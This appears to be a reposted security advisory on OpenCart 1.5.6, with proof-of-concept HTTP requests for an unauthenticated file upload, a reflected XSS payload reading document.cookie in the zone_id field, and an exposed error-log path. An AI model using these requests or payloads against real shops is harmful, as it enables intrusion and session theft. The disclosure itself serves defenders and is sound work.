###########################################################################
# Title: Opencart Multiple Vulnerabilities
# Vendor: http://www.opencart.com
# Vulnerabilities: Arbitrary File Upload, XSS, Path Disclosure
# Vulnerable Version: opencart 1.5.6 (prior versions also may be affected)
# Exploitation: Remote with browser
# Impact: High
# Vendor Supplied Patch: N/A
# Original Advisory with Workaround:
# http://www.garda.ir/Opencart_Multiple_Vulnerabilities.html
###########################################################################
####################
- Description:
####################
Quote from vendor: OpenCart is a turn-key ready "out of the box" shopping cart solution.
You simply install, select your template, add products and you're ready to start accepting orders.
####################
- Vulnerability:
####################
In the process of optimizing our crawler engine by garda.ir (garda.ir is a Persian online shopping price comparison service which uses new search engine technologies to grab prices) we found file upload vulnerability in opencart application, further investigation lead us to discover other vulnerabilities such as path disclosure and xss.
####################
- POC:
####################
# 1
# File Upload
# Insufficient Authorization in /catalog/controller/product/product.php
# Result: testupload.txt.somehash is created in /download folder
POST /opencart-1.5.6/index.php?route=product/product/upload HTTP/1.1
Host: example.com
Content-Type: multipart/form-data; boundary=---------------------------4827543632391
Content-Length: 206
Connection: Keep-Alive
-----------------------------4827543632391
Content-Disposition: form-data; name="file"; filename="testupload.txt"
Content-Type: text/plain
testtesttest
-----------------------------4827543632391--
# 2
# Reflected XSS and Path Disclosure
# Input Validation Error in /catalog/controller/account/register.php
# Result: this will cause arbitrary scripting code to be executed by the # target user's browser.
POST /opencart-1.5.6/index.php?route=account/register HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------1e7a98bc645efbe7
Content-Length: 181
Host: example.com
Connection: Keep-Alive
-----------------------------1e7a98bc645efbe7
Content-Disposition: form-data; name="zone_id"
12345'+alert(document.cookie)+'
-----------------------------1e7a98bc645efbe7--
# 3
# Information Leakage – Path Disclosure
# Insufficient Authorization in /system/logs/error.txt
# Result: Information Disclosure
http://www.example.com/opencart-1.5.6/system/logs/error.txt
####################
- Solution:
####################
There is no Vendor Supplied Patch at the time of this entry.
For workaround check the Original Advisory.
####################
- Credit:
####################
Discovered by: trueend5 (trueend5 [at] yahoo com)
This advisory is sponsored by garda.ir
http://www.garda.ir
A Persian online shopping price comparison service
Related Posts
Exclusive Updates from 'The Hacker News'20 Jan 20141p {margin:0;} .desc img {width:auto;height:auto;max-width:175px;float:right;padding:0 0 0 10px;} ...Read more »
![[slackware-security] hplip (SSA:2013-339-04)](http://1.bp.blogspot.com/-htG7vy9vIAA/Tp0KrMUdoWI/AAAAAAAABAU/e7XkFtErqsU/s1600/grey.gif)
[slackware-security] hplip (SSA:2013-339-04)05 Dec 20130-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 [slackware-security] hplip (SSA:2013-339-04) New hp...Read more »
- [slackware-security] seamonkey (SSA:2013-339-03)05 Dec 20130
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 [slackware-security] seamonkey (SSA:2013-339-03) Ne...Read more »
- [slackware-security] mozilla-thunderbird (SSA:2013-339-02)05 Dec 20130
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 [slackware-security] mozilla-thunderbird (SSA:2013-3...Read more »
Subscribe to:
Post Comments (Atom)
No Live Link !!!. nice artickel gan.
ReplyDelete